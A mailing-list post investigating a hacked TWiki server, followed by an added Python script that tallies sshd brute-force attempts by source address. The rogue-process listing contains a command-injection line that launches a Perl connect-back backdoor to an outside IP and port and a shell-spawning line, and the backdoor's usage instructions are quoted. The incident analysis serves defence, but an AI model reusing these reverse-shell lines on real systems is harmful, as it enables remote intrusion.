Re: Wiki hacked?
+++ Wookey [05-09-29 17:57 +0100]:
> +++ Wolfgang Denk [05-09-29 17:11 +0200]:
> And the reason there is no debian update for it is that the debian twiki
> package is not installed. Looks like whoever installed twiki put their own
> tarball in instead of the debian package.
>
> That was a mistake - leaves you exposed to security flaws down the line...
OK - it looks like there isn't a twiki package in testing (which the server
is running), which is no doubt why we have a manual install.
> I'll change over to the debian one ASAP. If anyone knows how to do that
> without losing the current content then do feel free to stick your oar in.
I've put in the twiki package from unstable but kept the machine pinned at
testing.
Found a bit more evidence of wrongdoing:
we have these rogue www-data processes:
22605 ./bind 1234
22905 sh -c /usr/bin/rlog -rr1.37|perl /var/tmp/backup.pl 222.124.24.19 995 '/var/www/twiki/data/Main/TWikiUsers.t
22907 lpd
22908 sh -c echo "uname -a";echo "id";/bin/sh
22913 /bin/sh
22924 ./stack
22925 ./stack
22926 ./stack
the last stack is using 99% CPU and has used 4365:59 system time
and /var/tmp/backup.pl is an exploit:
#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox, for example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl connect.pl <iptoolbox> <ncportlisten>
# --------
# The supplied exploit code is not to be used for malicious purpose, but for educational purpose only. The Authors and
# 1ndonesian Security Team WILL NOT responsible for anything happened by the couse of using all information on these website.
# ---------
It's pointing at what looks like a Malaysian server, 222.124.24.19 port 995,
which is pop3s.
I've killed those processes and moved the files.
There are loads of messages like:
Sep 25 14:06:14 onz sshd[15369]: Illegal user chloe from 67.43.156.87
from Sep 19th to today - looks like a brute-force attempt to log in?
It comes from these servers:
61.222.201.234 21:46 to 22:01 on Sep 19th
222.96.156.87 12:31 to 13:06 on Sep 20th
218.93.19.46 13:34 to 13:43 on Sep 20th
211.22.100.150 23:14 to 23:16 on Sep 21st
67.121.61.114 11:40 to 12:26 on Sep 22nd
195.251.209.2 at 18:06 on Sep 22nd
202.91.170.2 20:30 to 20:49 on Sep 22nd, including a lot of messages like
Sep 22 20:47:12 onz sshd[8760]: reverse mapping checking getaddrinfo for luis.spu.edu.ph failed - POSSIBLE BREAKIN ATTEMPT!
82.232.9.181 14:42 to 15:04 on Sep 23rd
203.253.176.203 at 17:10 on Sep 23rd
and so on.
The original www-data failed login came from 85.186.165.112:
Sep 19 20:12:46 onz sshd[27962]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=85.186.165.112 user=www-data
Sep 19 20:12:48 onz sshd[27959]: error: PAM: Authentication failure for
www-data from 85.186.165.112
Sep 19 20:12:59 onz sshd[27959]: error: PAM: Authentication failure for
www-data from 85.186.165.112
Sep 19 20:13:04 onz sshd[27959]: error: PAM: Have exhasted maximum number of
retries for service. for www-data from 85.186.165.112
OK - that's enough for tonight
Wookey
--
Aleph One Ltd, Bottisham, CAMBRIDGE, CB5 9BA, UK Tel +44 (0) 1223 811679
work: http://www.aleph1.co.uk/ play: http://www.chaos.org.uk/~wookey/
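As an added illustration (not part of Wookey's post and not tooling from the list or the server in question): a small Python script that does the per-source tabulation the message works out by hand. It recognises the three sshd failure shapes quoted above ("Illegal user X from IP", "error: PAM: Authentication failure for X from IP", and the pam_unix line with rhost=/user= fields), groups them by source address with first/last time, attempt count and the set of user names tried, and flags sources over a threshold. The log lines embedded in it are constructed in the style of the quoted ones, and the year is an assumption because syslog timestamps omit it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in the syslog format quoted in the post (not the real /var/log/auth.log).
SAMPLE_LOG = """\
Sep 19 20:12:46 onz sshd[27962]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=85.186.165.112 user=www-data
Sep 19 20:12:48 onz sshd[27959]: error: PAM: Authentication failure for www-data from 85.186.165.112
Sep 19 20:12:59 onz sshd[27959]: error: PAM: Authentication failure for www-data from 85.186.165.112
Sep 19 20:13:04 onz sshd[27959]: error: PAM: Have exhasted maximum number of retries for service. for www-data from 85.186.165.112
Sep 19 21:46:02 onz sshd[1001]: Illegal user admin from 61.222.201.234
Sep 19 21:50:11 onz sshd[1002]: Illegal user test from 61.222.201.234
Sep 19 22:01:40 onz sshd[1003]: Illegal user oracle from 61.222.201.234
Sep 22 20:47:12 onz sshd[8760]: reverse mapping checking getaddrinfo for luis.spu.edu.ph failed - POSSIBLE BREAKIN ATTEMPT!
Sep 22 20:47:13 onz sshd[8760]: Illegal user chloe from 202.91.170.2
Sep 22 20:30:01 onz sshd[8700]: Illegal user bob from 202.91.170.2
Sep 25 14:06:14 onz sshd[15369]: Illegal user chloe from 67.43.156.87
"""

# The three failed-login message shapes quoted in the post. Anything else (reverse-mapping
# warnings, "exhasted maximum number of retries") is deliberately ignored.
_TS = r"(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d)"
PATTERNS = [
    re.compile(_TS + r" \S+ sshd\[\d+\]: Illegal user (?P<user>\S+) from (?P<rhost>\S+)$"),
    re.compile(_TS + r" \S+ sshd\[\d+\]: error: PAM: Authentication failure for (?P<user>\S+) from (?P<rhost>\S+)$"),
    re.compile(_TS + r" \S+ sshd\[\d+\]: \(pam_unix\) authentication failure;.* rhost=(?P<rhost>\S+) +user=(?P<user>\S+)$"),
]
ASSUMED_YEAR = 2005  # assumption: syslog lines carry no year; the post is from Sep 2005


def parse_line(line):
    """Return (timestamp, user, rhost) for a failed-login line, or None for anything else."""
    for pat in PATTERNS:
        m = pat.match(line.strip())
        if m:
            ts = datetime.strptime(f"{m['ts']} {ASSUMED_YEAR}", "%b %d %H:%M:%S %Y")
            return ts, m["user"], m["rhost"]
    return None


def summarize(log_text):
    """Group failed logins by source address: attempt count, user names tried, first/last time."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            ts, user, rhost = parsed
            events[rhost].append((ts, user))
    summary = {}
    for rhost, evs in events.items():
        evs.sort()  # lines may arrive out of order (different sshd children)
        summary[rhost] = {
            "count": len(evs),
            "users": {u for _, u in evs},
            "first": evs[0][0].strftime("%b %d %H:%M:%S"),
            "last": evs[-1][0].strftime("%b %d %H:%M:%S"),
        }
    return summary


def brute_force_sources(summary, min_attempts=3):
    """Sources with at least min_attempts failures, most active first, then by address."""
    hits = [h for h, s in summary.items() if s["count"] >= min_attempts]
    return sorted(hits, key=lambda h: (-summary[h]["count"], h))


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    for rhost in brute_force_sources(report):
        s = report[rhost]
        print(f"{rhost}: {s['count']} failures, {s['first']} to {s['last']}, users={sorted(s['users'])}")
```

Run it against a real auth log with `summarize(open("/var/log/auth.log").read())`; a single source trying many different user names in a short window is the usual password-guessing signature, while repeated failures for one real account (as with www-data here) is worth a separate look.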